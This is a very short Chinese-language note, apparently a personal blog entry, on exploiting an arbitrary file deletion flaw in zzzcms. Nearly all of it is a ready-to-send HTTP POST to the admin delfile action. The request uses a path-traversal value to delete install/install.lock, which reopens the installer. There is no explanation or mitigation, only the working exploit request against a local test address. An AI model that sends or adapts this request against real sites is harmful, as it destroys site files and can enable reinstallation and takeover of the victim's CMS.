【笔记】zzzcms任意文件删除漏洞利用

前言

zzzcms任意文件删除漏洞利用

漏洞利用

request
1
2
3
4
POST http://127.0.0.1:80/admin/save.php?act=delfile
Content-Type: application/x-www-form-urlencoded

path=/upload/../install/install.lock

完成